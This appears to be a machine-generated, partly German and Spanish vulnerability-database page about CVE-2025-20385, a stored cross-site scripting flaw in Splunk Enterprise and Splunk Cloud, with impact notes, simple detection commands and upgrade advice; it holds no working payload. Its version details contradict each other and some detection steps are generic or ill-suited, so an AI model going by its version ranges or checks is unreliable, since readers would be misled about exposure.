Plattform
splunk
Komponente
splunk-enterprise
Behoben in
10.0.2
9.4.6
9.3.8
9.2.10
10.1.2507.6
10.0.2503.7
9.3.2411.117
CVE-2025-20385 is a Cross-Site Scripting (XSS) vulnerability affecting Splunk Enterprise versions prior to 10.1.2507.6 and Splunk Cloud Platform versions prior to 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117. An attacker with the adminallobjects role can exploit this vulnerability to execute malicious JavaScript code within a user's browser. The vulnerability was published on December 3, 2025, and a fix is available in the specified versions.
This XSS vulnerability allows a malicious user with the adminallobjects role to inject arbitrary JavaScript code into the Splunk Enterprise interface. This code will then execute in the context of other users' browsers when they navigate to the affected collection. An attacker could leverage this to steal session cookies, redirect users to phishing sites, or deface the Splunk interface. The impact is particularly concerning given the high privileges associated with the adminallobjects role, potentially granting an attacker access to sensitive data and control over the Splunk environment. Successful exploitation could lead to unauthorized data access and modification, impacting the integrity and confidentiality of Splunk data.
CVE-2025-20385 is currently not listed on the CISA KEV catalog. Public proof-of-concept exploits are not yet available, but the vulnerability's relatively simple nature suggests that one may emerge. The LOW CVSS score reflects the requirement for an adminallobjects role, limiting the potential attack surface. The vulnerability was publicly disclosed on December 3, 2025.
Organizations heavily relying on Splunk Enterprise for security monitoring and incident response are particularly at risk. Environments where the adminallobjects role is broadly assigned, or where users have excessive privileges within Splunk, face a higher probability of exploitation. Shared hosting environments running Splunk Enterprise are also vulnerable.
• linux / server: Examine Splunk logs for unusual JavaScript execution attempts or suspicious network requests originating from the Splunk server. Use journalctl -u splunkd to filter for errors related to collection navigation.
journalctl -u splunkd | grep -i "javascript:"• generic web: Monitor Splunk's web interface for unexpected behavior or redirects. Use curl to check for unusual characters in collection names and descriptions.
curl -I "http://splunk_server/app/your_app/collection/collection_name_with_potential_xss" | grep "Content-Type"• windows / supply-chain: Review scheduled tasks and PowerShell scripts that interact with Splunk to ensure they are not compromised and injecting malicious code. Use Get-ScheduledTask to check for suspicious tasks.
Get-ScheduledTask | Where-Object {$_.TaskName -like "*splunk*"}disclosure
patch
Exploit-Status
EPSS
0.05% (14% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2025-20385 is to upgrade Splunk Enterprise to version 10.1.2507.6 or later, or Splunk Cloud Platform to version 10.1.2507.6, 10.0.2503.7, or 9.3.2411.117. If immediate upgrade is not possible, consider restricting the adminallobjects role to only trusted users. While a direct WAF rule is difficult to implement due to the nature of XSS, carefully review and restrict allowed HTML tags and attributes within collection names and descriptions. After upgrade, confirm the vulnerability is resolved by attempting to inject a simple JavaScript payload within a collection's navigation bar and verifying that it does not execute.
Actualice Splunk Enterprise a la versión 10.0.2, 9.4.6, 9.3.8, 9.2.10 o superior. Para Splunk Cloud Platform, actualice a la versión 10.1.2507.6, 10.0.2503.7 o 9.3.2411.117 o superior. Esto corrige la vulnerabilidad XSS almacenada en la barra de navegación.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2025-20385 is a Cross-Site Scripting (XSS) vulnerability in Splunk Enterprise versions before 10.1.2507.6, allowing attackers with the adminallobjects role to execute JavaScript.
You are affected if you are running Splunk Enterprise versions earlier than 10.1.2507.6 or Splunk Cloud Platform versions earlier than 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, and have users with the adminallobjects role.
Upgrade Splunk Enterprise to version 10.1.2507.6 or later, or Splunk Cloud Platform to version 10.1.2507.6, 10.0.2503.7, or 9.3.2411.117. Restrict the adminallobjects role if immediate upgrade is not possible.
There are currently no confirmed reports of active exploitation, but the vulnerability's simplicity suggests it may be targeted in the future.
Refer to the official Splunk security advisory for CVE-2025-20385 on the Splunk website (link to advisory would be here if available).
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.